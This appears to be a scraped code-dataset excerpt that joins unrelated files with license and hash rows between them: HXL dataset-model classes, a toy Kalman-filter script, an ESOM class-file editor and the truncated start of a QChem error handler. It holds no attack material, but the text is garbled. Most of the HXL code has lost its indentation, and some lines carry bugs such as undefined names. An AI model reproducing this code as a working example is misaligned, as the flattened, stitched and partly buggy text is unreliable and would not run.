@property
def is_cached(self):
"""Test whether the source data is cached (replayable).
By default, this is False, but some subclasses may override.
@returns: C{True} if the input is cached (replayable); C{False} otherwise.
"""
return False
@property
@abc.abstractmethod
def columns(self):
"""Get the column definitions for the dataset.
@returns: a list of Column objects.
"""
raise RuntimeException("child class must implement columns property method")
@property
def columns_hash(self):
"""Generate a hash across all of the columns in the dataset.
This function helps detect whether two HXL documents are of
the same type, even if they contain different data (e.g. the
HXL API output for the same humanitarian dataset in two
different months or two different countries).
It takes into account text headers, hashtags, the order of
attributes, and the order of columns. Whitespace is
normalised, and null values are treated as empty strings. The
MD5 hash digest is generated from a UTF-8 encoded version of
each header.
@returns: a 32-character hex-formatted MD5 hash string
"""
md5 = hashlib.md5()
for column in self.columns:
md5.update(hxl.datatypes.normalise_space(column.header).encode('utf-8'))
for column in self.columns:
md5.update(hxl.datatypes.normalise_space(column.display_tag).encode('utf-8'))
return md5.hexdigest()
@property
def data_hash(self):
"""Generate a hash for the entire dataset.
This function allows checking if two HXL datasets are
functionally identical. It takes into account text headers,
hashtags, the order of attributes, and the order of
columns. Whitespace is normalised, and null values are treated
as empty strings. The MD5 hash digest is generated from a
UTF-8 encoded version of each header and data cell.
@returns: a 32-character hex-formatted MD5 hash string
"""
md5 = hashlib.md5()
# text header row
for column in self.columns:
md5.update(hxl.datatypes.normalise_space(column.header).encode('utf-8'))
# hashtag row
for column in self.columns:
md5.update(hxl.datatypes.normalise_space(column.display_tag).encode('utf-8'))
# data rows
for row in self:
for value in row:
md5.update(hxl.datatypes.normalise_space(value).encode('utf-8'))
return md5.hexdigest()
@property
def headers(self):
"""Return a list of header strings (for a spreadsheet row).
"""
return [column.header if column else '' for column in self.columns]
@property
def tags(self):
"""Get all hashtags (without attributes) as a list
@returns: a list of base hashtags for the dataset columns
"""
return [column.tag if column else '' for column in self.columns]
@property
def display_tags(self):
"""Return a list of display tags.
@returns: a list of strings containing the hashtag and attributes for each column
"""
return [column.display_tag if column else '' for column in self.columns]
@property
def has_headers(self):
"""Report whether any non-empty header strings exist.
@returns: C{True} if there is at least one column with a non-empty header string
"""
for column in self.columns:
if column.header:
return True
return False
@property
def values(self):
"""Get all values for the dataset at once, in an array of arrays.
This method can be highly inefficient for large datasets.
@returns: an array of arrays of scalar values
"""
return [row.values for row in self]
def get_value_set(self, tag_pattern=None, normalise=False):
"""Return the set of all values in a dataset (optionally matching a tag pattern for a single column)
Warning: this method can be highly inefficient for large datasets.
@param tag_pattern: (optional) return values only for columns matching this tag pattern.
@param normalise: (optional) normalise the strings with hxl.datatypes.normalise (default: False)
@returns: a Python set of values
"""
value_set = set([])
if tag_pattern:
tag_pattern = TagPattern.parse(tag_pattern)
for row in self:
if tag_pattern:
new_values = row.get_all(tag_pattern)
else:
new_values = row.values
if normalise:
new_values = [hxl.datatypes.normalise(s) for s in new_values]
else:
new_values = [hxl.datatypes.normalise_space(s) for s in new_values]
value_set.update(new_values)
return value_set
def get_column_indices(self, tag_patterns, columns):
"""Get a list of indices that match the tag patterns provided
@param tag_patterns: a list of tag patterns or a string version of the list
@param columns: a list of columns
@returns: a (possibly-empty) list of 0-based indices
"""
patterns = TagPattern.parse_list(tag_patterns)
indices = []
for i, column in enumerate(columns):
for pattern in patterns:
if pattern.match(column):
                    indices.append(i)
return indices
#
# Aggregates
#
def _get_minmax(self, pattern, op):
"""Calculate the extreme min/max value for a tag pattern
Will iterate through the dataset, and use values from multiple matching columns.
Uses numbers, dates, or strings for comparison, based on the first non-empty value found.
@param pattern: the L{hxl.model.TagPattern} to match
@param op: operator_lt or operator_gt
@returns: the extreme value according to operator supplied, or None if no values found
"""
pattern = TagPattern.parse(pattern)
result_raw = None # what's actually in the dataset
result_normalised = None # normalised version for comparison
# Look at every row
for row in self:
# Look at every matching value in every row
for i, value in enumerate(row.get_all(pattern)):
# ignore empty values
if hxl.datatypes.is_empty(value):
continue
# make a normalised value for comparison
normalised = hxl.datatypes.normalise(value, row.columns[i])
# first non-empty value is always a match
if result_normalised is None:
result_raw = value
result_normalised = normalised
else:
# try comparing the normalised types first, then strings on failure
try:
if op(normalised, result_normalised):
result_raw = value
result_normalised = normalised
except TypeError:
if op(str(normalised), str(result_normalised)):
result_raw = value
result_normalised = normalised
return result_raw
def min(self, pattern):
"""Calculate the minimum value for a tag pattern
Will iterate through the dataset, and use values from multiple matching columns.
Uses numbers, dates, or strings for comparison, based on the first non-empty value found.
@param pattern: the L{hxl.model.TagPattern} to match
@returns: the minimum value according to the '<' operator, or None if no values found
"""
return self._get_minmax(pattern, operator.lt)
def max(self, pattern):
"""Calculate the maximum value for a tag pattern
Will iterate through the dataset, and use values from multiple matching columns.
@param pattern: the L{hxl.model.TagPattern} to match
@returns: the minimum value according to the '<' operator, or None if no values found
"""
return self._get_minmax(pattern, operator.gt)
#
# Utility
#
def validate(self, schema=None, callback=None):
"""
Validate the current dataset.
@param schema (optional) the pre-compiled schema, schema filename, URL, file object, etc. Defaults to a built-in schema.
@param callback (optional) a function to call with each error or warning. Defaults to collecting errors in an array and returning them.
"""
return hxl.schema(schema, callback).validate(self)
def recipe(self, recipe):
"""Parse a recipe (JSON or a list of dicts) and create the appropriate filters.
@param recipe: a list of dicts, a single dict, or a JSON literal string.
@return: the new end filter.
"""
import hxl.filters
return hxl.filters.from_recipe(self, recipe)
#
# Filters
#
def append(self, append_sources, add_columns=True, queries=[]):
"""Append additional datasets.
@param append_sources: a list of sources to append
@param add_columns: if True (default), include any extra columns in the append sources
@param queries: a list of row queries to select rows for inclusion from the append sources.
@returns: a new HXL source for chaining
"""
import hxl.filters
return hxl.filters.AppendFilter(self, append_sources, add_columns=add_columns, queries=queries)
def append_external_list(self, source_list_url, add_columns=True, queries=[]):
"""Append additional datasets from an external list
@param source_list_url: URL of a HXL dataset containing a list of sources to append.
@param add_columns: if True (default), include any extra columns in the append sources.
@param queries: a list of row queries to select rows for inclusion from the append sources.
@returns: a new HXL source for chaining
"""
import hxl.filters
logger.debug("Loading append list from %s...", source_list_url)
append_sources = hxl.filters.AppendFilter.parse_external_source_list(source_list_url)
logger.debug("Done loading")
return hxl.filters.AppendFilter(self, append_sources, add_columns=add_columns, queries=queries)
def cache(self):
"""Add a caching filter to the dataset."""
import hxl.filters
return hxl.filters.CacheFilter(self)
def dedup(self, patterns=[], queries=[]):
"""Deduplicate a dataset."""
import hxl.filters
return hxl.filters.DeduplicationFilter(self, patterns=patterns, queries=queries)
def with_columns(self, includes):
"""Select matching columns."""
import hxl.filters
return hxl.filters.ColumnFilter(self, include_tags=includes)
def without_columns(self, excludes=None, skip_untagged=False):
"""Select non-matching columns."""
import hxl.filters
return hxl.filters.ColumnFilter(self, exclude_tags=excludes, skip_untagged=skip_untagged)
def with_rows(self, queries, mask=[]):
"""Select matching rows.
@param queries: a predicate or list of predicates for rows to include
@param mask: a predicate or list of predicates for rows to test (default: [] to test all)
@return: a filtered version of the source
"""
import hxl.filters
return hxl.filters.RowFilter(self, queries=queries, reverse=False, mask=mask)
def without_rows(self, queries, mask=[]):
"""Select non-matching rows.
@param queries: a predicate or list of predicates for rows to ignore
@param mask: a predicate or list of predicates for rows to test (default: [] to test all)
@return: a filtered version of the source
"""
import hxl.filters
return hxl.filters.RowFilter(self, queries=queries, reverse=True, mask=mask)
def sort(self, keys=None, reverse=False):
"""Sort the dataset (caching)."""
import hxl.filters
return hxl.filters.SortFilter(self, tags=keys, reverse=reverse)
def count(self, patterns=[], aggregators=None, queries=[]):
"""Count values in the dataset (caching)."""
import hxl.filters
return hxl.filters.CountFilter(
self, patterns=patterns, aggregators=aggregators, queries=queries
)
def row_counter(self, queries=[]):
"""Count the number of rows while streaming."""
import hxl.filters
return hxl.filters.RowCountFilter(self, queries=queries)
def replace_data(self, original, replacement, pattern=None, use_regex=False, queries=[]):
"""Replace values in a HXL dataset."""
import hxl.filters
replacement = hxl.filters.ReplaceDataFilter.Replacement(original, replacement, pattern, use_regex)
return hxl.filters.ReplaceDataFilter(self, [replacement], queries=queries)
def replace_data_map(self, map_source, queries=[]):
"""Replace values in a HXL dataset."""
import hxl.filters
replacements = hxl.filters.ReplaceDataFilter.Replacement.parse_map(hxl.data(map_source))
return hxl.filters.ReplaceDataFilter(self, replacements, queries=queries)
def add_columns(self, specs, before=False):
"""Add fixed-value columns to a HXL dataset."""
import hxl.filters
return hxl.filters.AddColumnsFilter(self, specs=specs, before=before)
def rename_columns(self, specs):
"""Changes headers and tags on a column."""
import hxl.filters
return hxl.filters.RenameFilter(self, specs)
def clean_data(
self, whitespace=[], upper=[], lower=[], date=[], date_format=None,
number=[], number_format=None, latlon=[], purge=False, queries=[]
):
"""Clean data fields."""
import hxl.filters
return hxl.filters.CleanDataFilter(
self,
whitespace=whitespace,
upper=upper,
lower=lower,
date=date, date_format=date_format,
number=number, number_format=number_format,
latlon=latlon,
purge=purge,
queries=queries
)
def merge_data(self, merge_source, keys, tags, replace=False, overwrite=False, queries=[]):
"""Merges values from a second dataset.
@param merge_source: the second HXL data source
@param keys: a single tagspec or list of tagspecs for the shared keys
@param tags: the tags to copy over from the second dataset
@param replace: if True, replace existing columns when present
@param overwrite: if True, overwrite individual values in existing columns when available
@param queries: optional row queries to control the merge
"""
import hxl.filters
return hxl.filters.MergeDataFilter(self, merge_source, keys, tags, replace, overwrite, queries=queries)
def expand_lists(self, patterns=None, separator="|", correlate=False, queries=[]):
"""Expand lists by repeating rows.
By default, applies to every column with a +list attribute, and uses "|" as the separator.
@param patterns: a single tag pattern or list of tag patterns for columns to expand
@param separator: the list-item separator
"""
import hxl.filters
return hxl.filters.ExpandListsFilter(self, patterns=patterns, separator=separator, correlate=correlate, queries=queries)
def explode(self, header_attribute='header', value_attribute='value'):
"""Explodes a wide dataset into a long datasets.
@param header_attribute: the attribute to add to the hashtag of the column with the former header (default 'header')
@param value_attribute: the attribute to add to the hashtag of the column with the former value (default 'value')
@return: filtered dataset.
@see hxl.filters.ExplodeFilter
"""
import hxl.filters
return hxl.filters.ExplodeFilter(self, header_attribute, value_attribute)
def implode(self, label_pattern, value_pattern):
"""Implodes a long dataset into a wide dataset
@param label_pattern: the tag pattern to match the label column
        @param value_pattern: the tag pattern to match the value column
@return: filtered dataset.
@see hxl.filters.ImplodeFilter
"""
import hxl.filters
return hxl.filters.ImplodeFilter(self, label_pattern=label_pattern, value_pattern=value_pattern)
def jsonpath(self, path, patterns=[], queries=[], use_json=True):
"""Parse the value as a JSON expression and extract data from it.
See http://goessner.net/articles/JsonPath/
@param path: a JSONPath expression for extracting data
@param patterns: a tag pattern or list of patterns for the columns to use (default to all)
@param queries: a predicate or list of predicates for the rows to consider.
@param use_json: if True, serialise multiple results as JSON lists.
@returns: filtered dataset
@see: hxl.filters.JSONPathFilter
"""
import hxl.filters
return hxl.filters.JSONPathFilter(self, path, patterns=patterns, queries=queries, use_json=use_json)
def fill_data(self, patterns=[], queries=[]):
"""Fills empty cells in a column using the last non-empty value.
@param patterns: a tag pattern or list of patterns for the columns to fill (default to all)
@param queries: a predicate or list of predicates for rows to fill (leave any blank that don't match).
@return filtered dataset
@see hxl.filters.FillFilter
"""
import hxl.filters
return hxl.filters.FillDataFilter(self, patterns=patterns, queries=queries)
#
# Generators
#
def gen_raw(self, show_headers=True, show_tags=True):
"""Generate an array representation of a HXL dataset, one at a time."""
if show_headers:
yield self.headers
if show_tags:
yield self.display_tags
for row in self:
yield row.values
def gen_csv(self, show_headers=True, show_tags=True):
"""Generate a CSV representation of a HXL dataset, one row at a time."""
class TextOut:
"""Simple string output source to capture CSV"""
def __init__(self):
self.data = ''
def write(self, s):
self.data += s
def get(self):
data = self.data
self.data = ''
return data
output = TextOut()
writer = csv.writer(output)
for raw in self.gen_raw(show_headers, show_tags):
writer.writerow(raw)
yield output.get()
def gen_json(self, show_headers=True, show_tags=True, use_objects=False):
"""Generate a JSON representation of a HXL dataset, one row at a time."""
is_first = True
yield "[\n"
if use_objects:
for row in self:
if is_first:
is_first = False
yield json.dumps(row.dictionary, sort_keys=True, indent=2)
else:
yield ",\n" + json.dumps(row.dictionary, sort_keys=True, indent=2)
else:
for raw in self.gen_raw(show_headers, show_tags):
if is_first:
is_first = False
yield json.dumps(raw)
else:
yield ",\n" + json.dumps(raw)
yield "\n]\n"
class Column(object):
"""
The definition of a logical column in the HXL data.
"""
# Regular expression to match a HXL tag
PATTERN = r'^\s*(#{token})((?:\s*\+{token})*)\s*$'.format(token=hxl.datatypes.TOKEN_PATTERN)
# To tighten debugging (may reconsider later -- not really a question of memory efficiency here)
__slots__ = ['tag', 'attributes', 'attribute_list', 'header', 'column_number']
def __init__(self, tag=None, attributes=(), header=None, column_number=None):
"""
Initialise a column definition.
@param tag: the HXL hashtag for the column (default: None)
@param attributes: (optional) a sequence of attributes (default: ())
@param header: (optional) the original plaintext header for the column (default: None)
@param column_number: (optional) the zero-based column number
"""
if tag:
tag = tag.lower()
self.tag = tag
self.header = header
self.column_number = column_number
self.attributes = set([a.lower() for a in attributes])
self.attribute_list = [a.lower() for a in attributes] # to preserve order
@property
def display_tag(self):
"""Default display version of a HXL hashtag.
Attributes are not sorted.
"""
return self.get_display_tag(sort_attributes=False)
def get_display_tag(self, sort_attributes=False):
"""
Generate a display version of the column hashtag
@param sort_attributes: if True, sort attributes; otherwise, preserve the original order
@return the reassembled HXL hashtag string, including language code
"""
if self.tag:
s = self.tag
for attribute in sorted(self.attribute_list) if sort_attributes else self.attribute_list:
s += '+' + attribute
return s
else:
return ''
def has_attribute(self, attribute):
"""Check if an attribute is present."""
return (attribute in self.attribute_list)
def add_attribute(self, attribute):
"""Add an attribute to the column."""
if attribute not in self.attributes:
self.attributes.add(attribute)
self.attribute_list.append(attribute)
return self
def remove_attribute(self, attribute):
"""Remove an attribute from the column."""
if attribute in self.attributes:
self.attributes.remove(attribute)
self.attribute_list.remove(attribute)
return self
def __hash__(self):
"""Make columns usable in a dictionary.
Only the hashtag and attributes are used.
"""
hash_value = hash(self.tag)
for attribute in self.attributes:
hash_value += hash(attribute)
return hash_value
def __eq__(self, other):
"""Test for comparison with another object.
For equality, only the hashtag and attributes have to be the same."""
try:
return (self.tag == other.tag and self.attributes == other.attributes)
except:
return False
def __repr__(self):
return self.display_tag
__str__ = __repr__
@staticmethod
def parse(raw_string, header=None, use_exception=False, column_number=None):
""" Attempt to parse a full hashtag specification.
@param raw_string: the string representation of the tagspec
@param header: the text header to include
@param use_exception: if True, throw an exception for a malformed tagspec
@returns: None if the string is empty, False if it's malformed (and use_exception is False), or a Column object otherwise
"""
# Already parsed?
if isinstance(raw_string, Column):
return raw_string
# Empty string?
if hxl.datatypes.is_empty(raw_string):
return None
# Pattern for a single tag
result = re.match(Column.PATTERN, raw_string)
if result:
tag = result.group(1)
attribute_string = result.group(2)
if attribute_string:
attributes = re.split(r'\s*\+', attribute_string.strip().strip('+'))
else:
attributes = []
return Column(tag=tag, attributes=attributes, header=header, column_number=column_number)
else:
if use_exception:
raise hxl.HXLException("Malformed tag expression: " + raw_string)
else:
logger.debug("Not a HXL hashtag spec: %s", raw_string)
return False
@staticmethod
def parse_spec(raw_string, default_header=None, use_exception=False, column_number=None):
"""Attempt to parse a single-string header/hashtag spec"""
# Already parsed?
if isinstance(raw_string, Column):
return raw_string
matches = re.match(r'^(.*)(#.*)$', raw_string)
if matches:
header = matches.group(1) if matches.group(1) else default_header
return Column.parse(matches.group(2), header=header, column_number=column_number)
else:
return Column.parse('#' + raw_string, header=default_header, column_number=column_number)
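# Hedged usage sketch (an addition, not part of the library API): parsing a
# combined header/hashtag spec into a Column and reading back its parts.
def _example_column_parse():
    column = Column.parse_spec("Affected people#affected+f+children")
    # ('Affected people', '#affected+f+children', ['children', 'f'])
    return column.header, column.display_tag, sorted(column.attributes)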
class Row(object):
"""
An iterable row of values in a HXL dataset.
"""
# Predefine the slots for efficiency (may reconsider later)
__slots__ = ['columns', 'values', 'row_number', 'source_row_number']
def __init__(self, columns, values=[], row_number=None, source_row_number=None):
"""
Set up a new row.
@param columns: The column definitions (array of Column objects).
@param values: (optional) The string values for the row (default: [])
@param row_number: (optional) The zero-based logical row number in the input dataset, if available (default: None)
@param source_row_number: (optional) The zero-based source row number in the input dataset, if available (default: None)
"""
self.columns = columns
self.values = copy.copy(values)
self.row_number = row_number
self.source_row_number = source_row_number
def append(self, value):
"""
Append a value to the row.
@param value The new value to append.
@return The new value
"""
self.values.append(value)
return value
def get(self, tag, index=None, default=None, parsed=False):
"""
Get a single value for a tag in a row.
If no index is provided ("None"), return the first non-empty value.
@param tag: A TagPattern or a string value for a tag.
@param index: The zero-based index if there are multiple values for the tag (default: None)
@param default: The default value if not found (default: None). Never parsed, even if parsed=True
@param parsed: If true, use attributes as hints to try to parse the value (e.g. number, list, date)
@return The value found, or the default value provided. If parsed=True, the return value will be a list (default: False)
"""
# FIXME - move externally, use for get_all as well, and support numbers and dates
def parse(column, value):
if parsed:
if column.has_attribute('list'):
return re.split(r'\s*,\s*', value)
else:
return [value]
return value
if type(tag) is TagPattern:
pattern = tag
else:
pattern = TagPattern.parse(tag)
for i, column in enumerate(self.columns):
if i >= len(self.values):
break
if pattern.match(column):
if index is None:
# None (the default) is a special case: it means look
# for the first truthy value
if self.values[i]:
return parse(column, self.values[i])
else:
# Otherwise, look for a specific index
if index == 0:
return parse(column, self.values[i])
else:
index = index - 1
return default
def get_all(self, tag, default=None):
"""
Get all values for a specific tag in a row
@param tag A TagPattern or a string value for a tag.
@return An array of values for the HXL hashtag.
"""
if type(tag) is TagPattern:
pattern = tag
else:
pattern = TagPattern.parse(tag)
result = []
for i, column in enumerate(self.columns):
if i >= len(self.values):
break
if pattern.match(column):
value = self.values[i]
if default is not None and not value:
value = default
result.append(value)
return result
def key(self, patterns=None, indices=None):
"""Generate a unique key tuple for the row, based on a list of tag patterns
@param patterns: a list of L{TagPattern} objects, or a parseable string
@returns: the key as a tuple (might be empty)
"""
key = []
# if the user doesn't provide indices, get indices from the pattern
if not indices and patterns:
indices = get_column_indices(patterns, self.columns)
if indices:
# if we have indices, use them to build the key
for i in indices:
if i < len(self.values):
key.append(hxl.datatypes.normalise(self.values[i], self.columns[i]))
else:
# if there are still no indices, use the whole row for the key
for i, value in enumerate(self.values):
key.append(hxl.datatypes.normalise(value, self.columns[i]))
return tuple(key) # make it into a tuple so that it's hashable
@property
def dictionary(self):
"""Return the row as a Python dict.
The keys will be HXL hashtags and attributes, normalised per HXL 1.1.
If two or more columns have the same hashtags and attributes, only the first will be included.
@return: The row as a Python dictionary.
"""
data = {}
for i, col in enumerate(self.columns):
key = col.get_display_tag(sort_attributes=True)
if key and (not key in data) and (i < len(self.values)):
data[key] = self.values[i]
return data
def __getitem__(self, index):
"""
Array-access method to make this class iterable.
@param index The zero-based index of a value to look up.
@return The value if it exists.
@exception IndexError if the index is out of range.
"""
return self.values[index]
def __str__(self):
"""
Create a string representation of a row for debugging.
"""
s = '<Row';
for column_number, value in enumerate(self.values):
s += "\n " + str(self.columns[column_number]) + "=" + str(value)
s += "\n>"
return s
class RowQuery(object):
"""Query to execute against a row of HXL data."""
def __init__(self, pattern, op, value, is_aggregate=False):
"""Constructor
@param pattern: the L{TagPattern} to match in the row
@param op: the operator function to use for comparison
@param value: the value to compare against
@param is_aggregate: if True, the value is a special placeholder like "min" or "max" that needs to be calculated
"""
self.pattern = TagPattern.parse(pattern)
self.op = op
self.value = value
# if the value is a formula, extract it
self.formula = None
result = re.match(r'^{{(.+)}}$', hxl.datatypes.normalise_space(value))
if result:
self.formula = result.group(1)
        self.is_aggregate = is_aggregate
self.needs_aggregate = False
"""Need to calculate an aggregate value"""
if is_aggregate:
self.needs_aggregate = True
# calculate later
self.date_value = None
self.number_value = None
self._saved_indices = None
def calc_aggregate(self, dataset):
"""Calculate the aggregate value that we need for the row query
Substitute the special values "min" and "max" with aggregates.
@param dataset: the HXL dataset to use (must be cached)
"""
if not self.needs_aggregate:
logger.warning("no aggregate calculation needed")
return # no need to calculate
if not dataset.is_cached:
raise HXLException("need a cached dataset for calculating an aggregate value")
if self.value == 'min':
self.value = dataset.min(self.pattern)
self.op = operator.eq
elif self.value == 'max':
self.value = dataset.max(self.pattern)
self.op = operator.eq
elif self.value == 'not min':
self.value = dataset.min(self.pattern)
self.op = operator.ne
elif self.value == 'not max':
self.value = dataset.max(self.pattern)
self.op = operator.ne
else:
raise HXLException("Unrecognised aggregate: {}".format(value))
self.needs_aggregate = False
def match_row(self, row):
"""Check if a key-value pair appears in a HXL row"""
# fail if we need an aggregate and haven't calculated it
        if self.needs_aggregate:
            raise hxl.HXLException("must call calc_aggregate before matching an 'is min' or 'is max' condition")
        # initialise if this is the first time matching for the row query
if self._saved_indices is None or self.formula:
# if it's a row formula, evaluate first
if self.formula:
value = hxl.formulas.eval.eval(row, self.formula)
else:
value = self.value
if self.pattern.tag == '#date':
try:
self.date_value = hxl.datatypes.normalise_date(value)
except ValueError:
self.date_value = None
try:
self.number_value = hxl.datatypes.normalise_number(value)
except ValueError:
self.number_value = None
self.string_value = hxl.datatypes.normalise_string(value)
# try all the matching column values
indices = self._get_saved_indices(row.columns)
for i in indices:
if i < len(row.values) and self.match_value(row.values[i], self.op):
return True
return False
def match_value(self, value, op):
"""Try matching as dates, then as numbers, then as simple strings"""
if self.date_value is not None:
try:
return op(hxl.datatypes.normalise_date(value), self.date_value)
except ValueError:
pass
if self.number_value is not None:
try:
return op(hxl.datatypes.normalise_number(value), self.number_value)
            except (ValueError, TypeError):
                pass
        return op(hxl.datatypes.normalise_string(value), self.string_value)
def _get_saved_indices(self, columns):
"""Cache the column tests, so that we run them only once."""
# FIXME - assuming that the columns never change
self._saved_indices = []
for i in range(len(columns)):
if self.pattern.match(columns[i]):
self._saved_indices.append(i)
return self._saved_indices
@staticmethod
def parse(query):
"""Parse a filter expression"""
if isinstance(query, RowQuery):
# already parsed
return query
parts = re.split(r'([<>]=?|!?=|!?~|\bis\b)', hxl.datatypes.normalise_string(query), maxsplit=1)
pattern = TagPattern.parse(parts[0])
op_name = hxl.datatypes.normalise_string(parts[1])
op = RowQuery.OPERATOR_MAP.get(op_name)
value = hxl.datatypes.normalise_string(parts[2])
is_aggregate = False
# special handling for aggregates (FIXME)
if op_name == 'is' and value in ('min', 'max', 'not min', 'not max'):
is_aggregate = True
return RowQuery(pattern, op, value, is_aggregate)
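    # Illustrative query strings this parser accepts (added for clarity; the tags
    # and values are hypothetical):
    #
    #   RowQuery.parse('#affected > 100')       # numeric comparison
    #   RowQuery.parse('#org ~ ^UN')            # regular-expression match
    #   RowQuery.parse('#date is not empty')    # "is" condition (see operator_is)
    #   RowQuery.parse('#affected is max')      # aggregate; requires calc_aggregate()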
@staticmethod
def parse_list(queries):
"""Parse a single query spec or a list of specs."""
if queries:
if not hasattr(queries, '__len__') or isinstance(queries, six.string_types):
# make a list if needed
queries = [queries]
return [hxl.model.RowQuery.parse(query) for query in queries]
else:
return []
@staticmethod
def match_list(row, queries=None, reverse=False):
"""See if any query in a list matches a row."""
if not queries:
# no queries = pass
return True
else:
# otherwise, must match at least one
for query in queries:
if query.match_row(row):
return not reverse
return reverse
@staticmethod
def operator_re(s, pattern):
"""Regular-expression comparison operator."""
return re.search(pattern, s)
@staticmethod
def operator_nre(s, pattern):
"""Regular-expression negative comparison operator."""
return not re.search(pattern, s)
@staticmethod
def operator_is(s, condition):
"""Advanced tests
Note: this won't be called for aggregate values like "is min" or "is not max";
for these, the aggregate will already be calculated, and a simple comparison
operator substituted by L{calc_aggregate}.
"""
if condition == 'empty':
return hxl.datatypes.is_empty(s)
elif condition == 'not empty':
return not hxl.datatypes.is_empty(s)
elif condition == 'number':
return hxl.datatypes.is_number(s)
elif condition == 'not number':
return not hxl.datatypes.is_number(s)
elif condition == 'date':
return (hxl.datatypes.is_date(s))
elif condition == 'not date':
return (hxl.datatypes.is_date(s) is False)
else:
raise hxl.HXLException('Unknown is condition: {}'.format(condition))
# Constant map of comparison operators
OPERATOR_MAP = {
'=': operator.eq,
'!=': operator.ne,
'<': operator.lt,
'<=': operator.le,
'>': operator.gt,
'>=': operator.ge,
}
# Static functions
def get_column_indices(tag_patterns, columns):
"""Get a list of column indices that match the tag patterns provided
@param tag_patterns: a list of tag patterns or a string version of the list
@param columns: a list of columns
@returns: a (possibly-empty) list of 0-based indices
"""
tag_patterns = TagPattern.parse_list(tag_patterns)
columns = [Column.parse(column) for column in columns]
indices = []
for i, column in enumerate(columns):
for pattern in tag_patterns:
if pattern.match(column):
indices.append(i)
return indices
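# Small hedged example of get_column_indices (the column list is hypothetical):
#
#   columns = ['#org', '#adm1+name', '#adm1+code', '#affected']
#   get_column_indices('#adm1', columns)   # -> [1, 2]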
# Extra static initialisation
RowQuery.OPERATOR_MAP['~'] = RowQuery.operator_re
RowQuery.OPERATOR_MAP['!~'] = RowQuery.operator_nre
RowQuery.OPERATOR_MAP['is'] = RowQuery.operator_is
# end
|
unlicense
| -8,416,026,671,488,264,000
| 38.114675
| 143
| 0.603247
| false
| 4.380029
| false
| false
| false
|
KDD-OpenSource/geox-young-academy
|
day-3/Kalman-filter_Mark.py
|
1
|
1494
|
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 11 10:10:24 2017
@author: Mark
"""
import numpy as np
import matplotlib.pyplot as plt
#Define functions
def model(state_0,A,B):
state_1 = A*state_0 + np.random.normal(0,B)
return state_1
state_null=np.random.normal(0,0.4)
def observation_function(state,R):
obs=state+np.random.normal(0,R)
return obs
def forecast(state_0,cov_0,A,B):
state_1=A*state_0
cov_1=A*cov_0*A+B
return state_1,cov_1
def analysis_formulas(state_1_hat,cov_1_hat,K,H,obs_0):
state_1 = state_1_hat - K*(H*state_1_hat - obs_0)
cov_1 = cov_1_hat - K*H*cov_1_hat
return state_1, cov_1
def kalman_gain(cov_1_hat,H,R):
K = cov_1_hat*H*(R+H*cov_1_hat*H)**(-1)
return K
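#For reference (comment added for clarity), the scalar Kalman equations implemented
#by the helpers above, with state x, covariance P, model A, model error B,
#observation operator H and observation error R:
#   forecast:  x_f = A*x_a,                P_f = A*P_a*A + B
#   gain:      K   = P_f*H / (R + H*P_f*H)
#   analysis:  x_a = x_f - K*(H*x_f - obs),    P_a = P_f - K*H*P_f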
#Initialize model parameters
A = 0.5
H = 1
B = 0.5
R = 0.1
lev = 100
#Synthetic Model
STATE_real = np.zeros(lev)
OBS_real = np.zeros(lev)
STATE_real[0] = np.random.normal(5,0.1)
OBS_real[0] = observation_function(STATE_real[0],R)
for i in range (1,lev-1):
STATE_real[i] = model(STATE_real[i-1],0.4,0.01)
OBS_real[i] = observation_function(STATE_real[i],R)
#Kalman-filter
STATE = np.zeros(lev)
COV = np.zeros(lev)
STATE[0] = state_null
COV[0] = B
for i in range (1,lev-1):
(state_hat,cov_hat) = forecast(STATE[i-1],COV[i-1],A,B)
K = kalman_gain(cov_hat,H,R)
(STATE[i],COV[i]) = analysis_formulas(state_hat,cov_hat,K,H,OBS_real[i])
plt.plot(STATE)
plt.plot(STATE_real)
|
mit
| 167,307,088,535,886,000
| 21.34375
| 76
| 0.613788
| false
| 2.270517
| false
| false
| false
|
Brazelton-Lab/lab_scripts
|
edit-esom-class-file.py
|
1
|
1891
|
#! /usr/bin/env python
"""
edit user-provided ESOM class file with new assignments in user-provided file
each line of user-provided file of new assignments should contain a data point number and a class number, separated by tabs
usage:
python edit-esom-class-file.py esom.cls new-assignments.tsv new-class-filename.cls
Copyright:
edit-esom-class-file.py Append user data to ESOM class file
Copyright (C) 2016 William Brazelton
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
cls_file = sys.argv[1]
user_file = sys.argv[2]
new_file = sys.argv[3]
# create dictionary of user-provided new assignments:
d = {}
with open(user_file) as user:
for line in user:
cols = line.split('\t')
data_point = cols[0].strip()
cls_number = cols[1].strip()
d[data_point] = cls_number.strip('\n')
# iterate through class file, writing new class file with new assignments:
with open(new_file,'w') as new:
with open(cls_file) as cls:
for line in cls:
if line[0] == '%': new.write(line)
else:
cols = line.split('\t')
if cols[0] in d: new.write(str(cols[0]) + '\t' + str(d[cols[0]]) + '\n')
else: new.write(line)
print 'WARNING: if you introduced new classes to this .cls file, you need to manually add them to the header of this new .cls file'
|
gpl-2.0
| -7,825,894,047,534,338,000
| 31.603448
| 131
| 0.710206
| false
| 3.501852
| false
| false
| false
|
xhqu1981/custodian
|
custodian/qchem/handlers.py
|
1
|
25246
|
# coding: utf-8
from __future__ import unicode_literals, division
import shutil
import time
"""
This module implements error handlers for QChem runs. Currently tested only
for B3LYP DFT jobs.
"""
import copy
import glob
import json
import logging
import os
import re
import tarfile
from pymatgen.core.structure import Molecule
from pymatgen.io.qchem import QcOutput, QcInput, QcTask
from custodian.custodian import ErrorHandler
__author__ = "Xiaohui Qu"
__version__ = "0.1"
__maintainer__ = "Xiaohui Qu"
__email__ = "xhqu1981@gmail.com"
__status__ = "Alpha"
__date__ = "12/04/13"
class QChemErrorHandler(ErrorHandler):
"""
Error handler for QChem Jobs. Currently tested only for B3LYP DFT jobs
generated by pymatgen.
"""
def __init__(self, input_file="mol.qcinp", output_file="mol.qcout",
ex_backup_list=(), rca_gdm_thresh=1.0E-3,
scf_max_cycles=200, geom_max_cycles=200, qchem_job=None):
"""
Initializes the error handler from a set of input and output files.
Args:
input_file (str): Name of the QChem input file.
output_file (str): Name of the QChem output file.
